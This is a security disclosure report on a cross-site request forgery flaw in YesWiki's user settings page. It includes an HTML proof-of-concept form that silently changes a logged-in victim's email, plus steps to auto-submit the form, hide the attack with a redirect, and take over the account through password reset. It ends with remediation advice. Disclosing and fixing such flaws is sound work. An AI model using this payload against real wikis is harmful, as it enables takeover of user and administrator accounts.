Cross-Site Request Forgery (CSRF) in yeswiki/yeswiki
Dec 6th 2021
While testing YesWiki I found that it does not implement any anti-CSRF mechanism. In particular, the change-email function of the user settings page (?ParametresUtilisateur) is vulnerable to Cross-Site Request Forgery, which leads to account takeover.
Proof of Concept
<html>
  <body>
    <!-- Cross-site form targeting the YesWiki user settings handler -->
    <form method="POST" action="https://yeswiki.net/cercopitheque/demo/?ParametresUtilisateur">
      <input type="hidden" name="usersettings_action" value="update"/>
      <input type="hidden" name="email" value="firstname.lastname@example.org"/>
      <input type="hidden" name="revisioncount" value="20"/>
      <input type="submit" value="Submit">
    </form>
  </body>
</html>
The attacker sends the victim a link to a page containing the above PoC (or embeds it in a page the victim visits while logged in to YesWiki). Because the browser attaches the victim's session cookie to the cross-site POST, the request is accepted as if the victim had submitted the settings form.
Instead of relying on the victim clicking Submit, the form can be submitted automatically by a short script that calls the form's submit method on page load; the victim's email address is then changed without any interaction, and the victim can afterwards be redirected to a third-party site so that nothing looks suspicious.
The attacker then uses the "forgot password" flow: the reset link is sent to the attacker-controlled email address, and the attacker sets a new password and takes over the account.
NOTE: the attack applies equally to an administrator account. Taking over an admin account lets the attacker compromise the confidentiality, integrity and availability of every other user's data on the wiki.
Implementing an anti-CSRF token (a random, per-session synchronizer token embedded in the settings form and validated server-side on every state-changing request) and/or a server-side check of the Origin/Referer header should be sufficient to resolve the root cause of the issue. Setting the session cookie with the SameSite attribute is a useful additional layer, but on its own it does not replace the token check.
Impact
Taking over user accounts, including administrator accounts.